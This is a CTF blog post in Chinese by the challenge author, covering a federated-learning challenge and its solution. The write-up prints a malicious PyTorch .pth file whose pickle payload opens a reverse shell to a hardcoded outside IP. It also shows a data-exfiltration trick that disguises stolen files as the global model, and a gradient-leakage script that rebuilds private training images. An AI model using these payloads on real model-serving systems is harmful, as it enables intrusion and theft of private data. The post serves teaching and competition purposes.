<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="题目设计本题通过在docker中隔离两个账户权限，模拟联邦学习框架。 123456789101112131415161718192021222324252627FROM python:3.10-slimRUN apt-get update &amp;&amp; apt-get install -y supervisor wget &amp;&amp; rm -rf &#x2F;var&#x2F;lib&#x2F;apt&#x2F;lis">
<meta property="og:type" content="article">
<meta property="og:title" content="Federate">
<meta property="og:url" content="http://example.com/2025/09/01/Federate/index.html">
<meta property="og:site_name" content="Cain&#39;s Blog">
<meta property="og:description" content="题目设计本题通过在docker中隔离两个账户权限，模拟联邦学习框架。 123456789101112131415161718192021222324252627FROM python:3.10-slimRUN apt-get update &amp;&amp; apt-get install -y supervisor wget &amp;&amp; rm -rf &#x2F;var&#x2F;lib&#x2F;apt&#x2F;lis">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/09/01/Federate/2025-09-01-16-40-28.png">
<meta property="article:published_time" content="2025-09-01T08:15:49.000Z">
<meta property="article:modified_time" content="2025-09-01T08:53:18.365Z">
<meta property="article:author" content="Cain">
<meta property="article:tag" content="MyChall">
<meta property="article:tag" content="第三届“天网杯”">
<meta property="article:tag" content="Federated Learning">
<meta property="article:tag" content="Gradient Leakage">
<meta property="article:tag" content="Supply chain attack">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/09/01/Federate/2025-09-01-16-40-28.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/Cain.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/Cain.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/Cain.png">
        
      
    
    <!-- title -->
    <title>Federate</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/09/01/Family/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/09/01/Federate/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/09/01/Federate/&text=Federate"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/09/01/Federate/&is_video=false&description=Federate"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Federate&body=Check out this article: http://example.com/2025/09/01/Federate/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/09/01/Federate/&name=Federate&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/09/01/Federate/&t=Federate"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%AE%BE%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text">题目设计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WriteUp"><span class="toc-number">2.</span> <span class="toc-text">WriteUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Something-Interest"><span class="toc-number">3.</span> <span class="toc-text">Something Interest</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Federate
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Cain</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-09-01T08:15:49.000Z" class="dt-published" itemprop="datePublished">2025-09-01</time>
        
        (Updated: <time datetime="2025-09-01T08:53:18.365Z" class="dt-updated" itemprop="dateModified">2025-09-01</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Federated-Learning/" rel="tag">Federated Learning</a>, <a class="p-category" href="/tags/Gradient-Leakage/" rel="tag">Gradient Leakage</a>, <a class="p-category" href="/tags/MyChall/" rel="tag">MyChall</a>, <a class="p-category" href="/tags/Supply-chain-attack/" rel="tag">Supply chain attack</a>, <a class="p-category" href="/tags/%E7%AC%AC%E4%B8%89%E5%B1%8A%E2%80%9C%E5%A4%A9%E7%BD%91%E6%9D%AF%E2%80%9D/" rel="tag">第三届“天网杯”</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="题目设计"><a href="#题目设计" class="headerlink" title="题目设计"></a>题目设计</h2><p>本题通过在docker中隔离两个账户权限，模拟联邦学习框架。</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">FROM</span> python:<span class="number">3.10</span>-slim</span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apt-get update &amp;&amp; apt-get install -y supervisor wget &amp;&amp; <span class="built_in">rm</span> -rf /var/lib/apt/lists/*</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> pip install -i https://mirrors.aliyun.com/pypi/simple/ \</span></span><br><span class="line"><span class="language-bash">    flask \</span></span><br><span class="line"><span class="language-bash">    requests \</span></span><br><span class="line"><span class="language-bash">    pillow \</span></span><br><span class="line"><span class="language-bash">    numpy </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> pip install -i https://pypi.mirrors.ustc.edu.cn/simple/ torch==2.3.0+cpu torchvision==0.18.0+cpu -f https://download.pytorch.org/whl/torch_stable.html</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> useradd -m -s /bin/bash victimuser</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> useradd -m -s /bin/bash serveruser</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> ./victim /app/victim</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> ./server /app/server</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chown</span> -R victimuser:victimuser /app/victim</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> 750 /app/victim</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chown</span> -R serveruser:serveruser /app/server</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> 755 /app/server</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> supervisord.conf /etc/supervisor/conf.d/supervisord.conf</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">CMD</span><span class="language-bash"> [<span class="string">&quot;/usr/bin/supervisord&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;/etc/supervisor/conf.d/supervisord.conf&quot;</span>]</span></span><br></pre></td></tr></table></figure>

<p>通过中心服务节点的供应链打击，最终通过梯度泄露的方式，最终窃取其他用户隐私数据，摧毁整个联邦框架。</p>
<h2 id="WriteUp"><a href="#WriteUp" class="headerlink" title="WriteUp"></a>WriteUp</h2><p>审计代码，题目的整体流程是:</p>
<pre><code>1. 三方参与的联邦学习模型，玩家、Victim、Server
2. 每一轮中，玩家先获取一个模型和脚本到本地，训练之后上传模型；server接着传输给victim，victim训练结束后返回一个模型。
</code></pre>
<p>为了获得victim的flag数据，我们首先要控制Server端。审计代码注意到torch.load有weight_only &#x3D; false，于是制作带有恶意代码的pth进行利用。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> runpy</span><br><span class="line"><span class="keyword">import</span> torch</span><br><span class="line"><span class="keyword">from</span> model <span class="keyword">import</span> LeNet</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Demo</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> runpy._run_code, (<span class="string">&quot;&quot;&quot;import os,pty,socket;s=socket.socket();s.connect((&quot;39.105.218.132&quot;,8080));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(&quot;sh&quot;)&quot;&quot;&quot;</span>, &#123;&#125;)</span><br><span class="line"></span><br><span class="line">model = LeNet(num_classes=<span class="number">100</span>)</span><br><span class="line">model_dict = model.state_dict()</span><br><span class="line">model_dict[<span class="string">&#x27;evil&#x27;</span>] = Demo()</span><br><span class="line">torch.save(model_dict, <span class="string">&#x27;evil.pth&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">res = requests.get(<span class="string">&#x27;http://localhost:8080/get_model&#x27;</span>)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;model.pth&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(res.content)</span><br><span class="line"></span><br><span class="line">res = requests.post(<span class="string">&#x27;http://localhost:8080/upload_model&#x27;</span>, files=&#123;<span class="string">&#x27;model&#x27;</span>: <span class="built_in">open</span>(<span class="string">&#x27;evil.pth&#x27;</span>, <span class="string">&#x27;rb&#x27;</span>)&#125;, data=&#123;<span class="string">&#x27;model_name&#x27;</span>: <span class="string">&#x27;client&#x27;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(res.json())</span><br><span class="line"></span><br><span class="line">res = requests.get(<span class="string">&#x27;http://localhost:8080/federated_round&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(res.json())</span><br></pre></td></tr></table></figure>

<p>注意到victim的训练过程关键如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">download_model()</span><br><span class="line"></span><br><span class="line">load_model()</span><br><span class="line"></span><br><span class="line">optimizer = optim.SGD(model.parameters(), lr=0.1)</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">img = Image.open(f&#x27;/app/victim/flag/&#123;round&#125;.png&#x27;).convert(&#x27;RGB&#x27;)</span><br><span class="line">img_tensor = transform(img).unsqueeze(0) </span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">send_model()</span><br></pre></td></tr></table></figure>

<p>因此在掌握了服务端模型的情况下，可以根据如下公式推出梯度</p>
<p>$$<br>Weight_{init} - Weight_{Trained} &#x3D; \frac{\mathrm{d} y}{\mathrm{d} x} \times SGD_{Lr}<br>$$</p>
<p>此时的模型<strong>初始化</strong>十分重要，因为当梯度分布不均匀时，逆向LBFGS优化的代价越大，可能出现梯度爆炸。</p>
<p>接着，通过伪造服务端消息向victim发送数据，保存临时模型文件。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> torch</span><br><span class="line"><span class="keyword">import</span> torch.nn <span class="keyword">as</span> nn</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">LeNet</span>(nn.Module):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, num_classes=<span class="number">10</span></span>):</span><br><span class="line">        <span class="built_in">super</span>(LeNet, <span class="variable language_">self</span>).__init__()</span><br><span class="line">        <span class="variable language_">self</span>.body = nn.Sequential(</span><br><span class="line">            nn.Conv2d(<span class="number">3</span>, <span class="number">12</span>, kernel_size=<span class="number">5</span>, padding=<span class="number">5</span>//<span class="number">2</span>, stride=<span class="number">2</span>),</span><br><span class="line">            nn.Sigmoid(),</span><br><span class="line">            nn.Conv2d(<span class="number">12</span>, <span class="number">12</span>, kernel_size=<span class="number">5</span>, padding=<span class="number">5</span>//<span class="number">2</span>, stride=<span class="number">2</span>),</span><br><span class="line">            nn.Sigmoid(),</span><br><span class="line">            nn.Conv2d(<span class="number">12</span>, <span class="number">12</span>, kernel_size=<span class="number">5</span>, padding=<span class="number">5</span>//<span class="number">2</span>, stride=<span class="number">1</span>),</span><br><span class="line">            nn.Sigmoid(),</span><br><span class="line">        )</span><br><span class="line">        <span class="variable language_">self</span>.fc = nn.Sequential(</span><br><span class="line">            nn.Linear(<span class="number">768</span>, num_classes)</span><br><span class="line">        )</span><br><span class="line">        </span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">forward</span>(<span class="params">self, x</span>):</span><br><span class="line">        out = <span class="variable language_">self</span>.body(x)</span><br><span class="line">        out = out.view(out.size(<span class="number">0</span>), -<span class="number">1</span>)</span><br><span class="line">        out = <span class="variable language_">self</span>.fc(out)</span><br><span class="line">        <span class="keyword">return</span> out</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">weights_init</span>(<span class="params">m</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">hasattr</span>(m, <span class="string">&quot;weight&quot;</span>):</span><br><span class="line">        m.weight.data.uniform_(-<span class="number">0.5</span>, <span class="number">0.5</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">hasattr</span>(m, <span class="string">&quot;bias&quot;</span>):</span><br><span class="line">        m.bias.data.uniform_(-<span class="number">0.5</span>, <span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">torch.manual_seed(<span class="number">12345</span>)</span><br><span class="line">model = LeNet(num_classes=<span class="number">100</span>)</span><br><span class="line">model.apply(weights_init)</span><br><span class="line">torch.save(model.state_dict(), <span class="string">&#x27;/app/server/global_model.pth&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">39</span>):</span><br><span class="line">    res = requests.get(<span class="string">f&#x27;http://localhost:5000/action?round=<span class="subst">&#123;i&#125;</span>&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(res.status_code)</span><br><span class="line">    os.mkdir(<span class="string">&#x27;/app/server/data&#x27;</span>)</span><br><span class="line">    os.system(<span class="string">f&#x27;cp /tmp/victim.pth /app/server/data/victim_<span class="subst">&#123;i&#125;</span>.pth&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>因为只有单端口开发，思考文件如何外发，通过覆盖全局模型，走get_model路由外发</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tar czvf data.tar data</span><br><span class="line"><span class="built_in">rm</span> global_model.pth</span><br><span class="line"><span class="built_in">mv</span> data.tar global_model.pth</span><br></pre></td></tr></table></figure>

<p>获取模型数据后，通过DLG梯度泄露来还原flag数据。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> torch</span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> numpy <span class="keyword">as</span> np</span><br><span class="line"><span class="keyword">import</span> torchvision.transforms <span class="keyword">as</span> transforms</span><br><span class="line"><span class="keyword">import</span> torch.nn <span class="keyword">as</span> nn</span><br><span class="line"><span class="keyword">import</span> torch.nn.functional <span class="keyword">as</span> F</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> matplotlib.pyplot <span class="keyword">as</span> plt</span><br><span class="line"><span class="keyword">from</span> model <span class="keyword">import</span> LeNet, cross_entropy_for_onehot, label_to_onehot</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">weights_init</span>(<span class="params">m</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">hasattr</span>(m, <span class="string">&quot;weight&quot;</span>):</span><br><span class="line">        m.weight.data.uniform_(-<span class="number">0.5</span>, <span class="number">0.5</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">hasattr</span>(m, <span class="string">&quot;bias&quot;</span>):</span><br><span class="line">        m.bias.data.uniform_(-<span class="number">0.5</span>, <span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">tt = transforms.ToTensor()  </span><br><span class="line">tp = transforms.ToPILImage()  </span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">39</span>):</span><br><span class="line">    torch.manual_seed(<span class="number">12345</span>)</span><br><span class="line">    model = LeNet(num_classes=<span class="number">100</span>)</span><br><span class="line">    model.apply(weights_init)</span><br><span class="line"></span><br><span class="line">    victim_model = LeNet(num_classes=<span class="number">100</span>)</span><br><span class="line">    victim_model.load_state_dict(torch.load(<span class="string">f&#x27;data/victim_<span class="subst">&#123;i&#125;</span>.pth&#x27;</span>, weights_only=<span class="literal">True</span>, map_location=<span class="string">&#x27;cpu&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    old_weights = [p.clone().detach() <span class="keyword">for</span> p <span class="keyword">in</span> model.parameters()]</span><br><span class="line">    new_weights = [p.clone().detach() <span class="keyword">for</span> p <span class="keyword">in</span> victim_model.parameters()]</span><br><span class="line"></span><br><span class="line">    original_dy_dx = []</span><br><span class="line">    <span class="keyword">for</span> old_p, new_p <span class="keyword">in</span> <span class="built_in">zip</span>(old_weights, new_weights):</span><br><span class="line">        recon_g = (old_p - new_p) / <span class="number">0.1</span></span><br><span class="line">        original_dy_dx.append(recon_g)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    dummy_data = torch.randn(<span class="number">1</span>,<span class="number">3</span>,<span class="number">32</span>,<span class="number">32</span>).requires_grad_(<span class="literal">True</span>)</span><br><span class="line">    dummy_label = torch.randn(<span class="number">1</span>,<span class="number">100</span>).requires_grad_(<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    criterion = cross_entropy_for_onehot</span><br><span class="line">    optimizer = torch.optim.LBFGS([dummy_data, dummy_label])</span><br><span class="line">    history = []</span><br><span class="line">    <span class="keyword">for</span> iters <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">151</span>):</span><br><span class="line">        <span class="keyword">def</span> <span class="title function_">closure</span>():</span><br><span class="line">            optimizer.zero_grad()</span><br><span class="line">            dummy_pred = model(dummy_data) </span><br><span class="line">            dummy_onehot_label = F.softmax(dummy_label, dim=-<span class="number">1</span>)</span><br><span class="line">            dummy_loss = criterion(dummy_pred, dummy_onehot_label) </span><br><span class="line">            dummy_dy_dx = torch.autograd.grad(dummy_loss, model.parameters(), create_graph=<span class="literal">True</span>)</span><br><span class="line">            grad_diff = <span class="number">0</span></span><br><span class="line">            <span class="keyword">for</span> gx, gy <span class="keyword">in</span> <span class="built_in">zip</span>(dummy_dy_dx, original_dy_dx): </span><br><span class="line">                grad_diff += ((gx - gy) ** <span class="number">2</span>).<span class="built_in">sum</span>()  </span><br><span class="line">            grad_diff.backward() </span><br><span class="line">            <span class="keyword">return</span> grad_diff</span><br><span class="line">        optimizer.step(closure)</span><br><span class="line">        <span class="keyword">if</span> iters % <span class="number">10</span> == <span class="number">0</span>: </span><br><span class="line">            current_loss = closure()</span><br><span class="line">            <span class="built_in">print</span>(iters, <span class="string">&quot;%.4f&quot;</span> % current_loss.item())</span><br><span class="line">            history.append(tp(dummy_data[<span class="number">0</span>]))</span><br><span class="line">    history[-<span class="number">1</span>].save(<span class="string">f&#x27;results//<span class="subst">&#123;i&#125;</span>.png&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>最终结果如下图</p>
<p><img src="/2025/09/01/Federate/2025-09-01-16-40-28.png"></p>
<h2 id="Something-Interest"><a href="#Something-Interest" class="headerlink" title="Something Interest"></a>Something Interest</h2><ol>
<li>出题结束时候恰逢BlackHat会议，存在其他供应链问题。</li>
<li>模型参数的初始化问题难以调整，想要一次交互获得能够进行优化的梯度的种子太少了，我尝试了42、12345，2345，1234，114514，4444，1111，2222等数二十种，最终选取了这个种子。</li>
<li>致歉：短横线 <strong>-</strong> 和下划线 **_**没有说明白，错了QaQ。</li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%AE%BE%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text">题目设计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WriteUp"><span class="toc-number">2.</span> <span class="toc-text">WriteUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Something-Interest"><span class="toc-number">3.</span> <span class="toc-text">Something Interest</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/09/01/Federate/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/09/01/Federate/&text=Federate"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/09/01/Federate/&title=Federate"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/09/01/Federate/&is_video=false&description=Federate"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Federate&body=Check out this article: http://example.com/2025/09/01/Federate/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
